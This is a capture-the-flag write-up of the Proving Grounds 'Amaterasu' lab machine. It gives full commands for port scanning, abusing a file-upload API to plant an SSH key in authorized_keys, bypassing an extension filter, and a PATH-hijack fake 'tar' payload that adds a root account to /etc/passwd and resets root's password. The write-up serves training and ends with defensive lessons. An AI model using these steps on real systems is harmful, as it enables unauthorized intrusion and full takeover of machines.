PGPlay-Amaterasu¶

Overview¶

Target: Amaterasu
Platform: Proving Grounds Play
OS: Linux (Fedora / Apache 2.4.53)

The attack path was:

Enumerate exposed custom web API endpoints.
Abuse file upload to write an SSH public key into alfredo's authorized_keys.
SSH as alfredo.
Abuse PATH hijacking in a root cron script to execute a malicious tar.
Get root access and retrieve proof.

1. Initial enumeration¶

nmap  -sV -p- 192.168.143.249 -T4 -oN amaterasu.nmap

Result:

Nmap scan report for 192.168.143.249
Host is up (0.025s latency).
Not shown: 65501 filtered tcp ports (no-response), 30 closed tcp ports (conn-refused)
PORT      STATE SERVICE
21/tcp    open  ftp
25022/tcp open  ssh
33414/tcp open  http
40080/tcp open  http

Web service on 33414 exposed an API:

curl -s http://192.168.143.249:33414/info
# Python File Server REST API v2.5

curl -s http://192.168.143.249:33414/help

Endpoints:

GET /info
GET /help
GET /file-list?dir=/tmp
POST /file-upload

2. Initial access - file upload to SSH¶

The upload endpoint accepted a filename parameter and wrote files to arbitrary paths.

Quick write test:

curl -X POST "http://192.168.143.249:33414/file-upload?dir=/tmp" \
    -F "file=@test.txt" \
    -F "filename=/home/alfredo/test.txt"

Create attacker keypair:

ssh-keygen -t ed25519 -C 'alfredo@amaterasu' -f alfredo.id_ed25519

Direct .pub upload was blocked by extension filtering:

curl -X POST "http://192.168.143.249:33414/file-upload" \
    -F "file=@alfredo.id_ed25519.pub" \
    -F "filename=/home/alfredo/.ssh/authorized_keys"

# {"message":"Allowed file types are txt, pdf, png, jpg, jpeg, gif"}

Bypass: rename public key to .txt, but still write to authorized_keys:

cp alfredo.id_ed25519.pub alfredo.id_ed25519.txt

curl -X POST "http://192.168.143.249:33414/file-upload" \
    -F "file=@alfredo.id_ed25519.txt" \
    -F "filename=/home/alfredo/.ssh/authorized_keys"

SSH access:

ssh -i alfredo.id_ed25519 -p 25022 alfredo@192.168.143.249

3. Privilege escalation - Cron & PATH abuse¶

/etc/crontab showed a root task every minute:

*/1 * * * * root /usr/local/bin/backup-flask.sh

Script content:

#!/bin/sh
export PATH="/home/alfredo/restapi:$PATH"
cd /home/alfredo/restapi
tar czf /tmp/flask.tar.gz *

Root script prepends a user-writable directory (/home/alfredo/restapi) to PATH and calls tar without absolute path.

Create malicious tar in /home/alfredo/restapi/tar:

cat > /home/alfredo/restapi/tar << 'EOF'
#!/bin/bash
echo "root2:$(openssl passwd test):0:0:root:/root:/bin/bash" >> /etc/passwd
echo "root:pwned" | /usr/sbin/chpasswd
EOF

chmod +x /home/alfredo/restapi/tar

Wait for cron execution (up to 1 minute), then switch to root:

su root2
# password: test

Alternative root auth from payload:

su root
# password: pwned

Read proof:

cat /root/proof.txt

Attack Path Summary¶

Step	Description
Recon	Enumerated custom Python File Server API
Initial Access	Arbitrary file upload wrote SSH key to `/home/alfredo/.ssh/authorized_keys`
Foothold	SSH login as `alfredo` on port `25022`
PrivEsc	Root cron script vulnerable to `PATH` hijacking (`tar` command)
Root	Malicious `tar` executed as root via cron

Key Takeaways¶

File extension filtering alone is not sufficient if server-side path handling is unsafe.
Arbitrary file write can often be chained into SSH authorized key access.
Cron scripts must use absolute paths for binaries (/usr/bin/tar) and avoid user-controlled directories in PATH.
Review every root cron job early during Linux privilege escalation.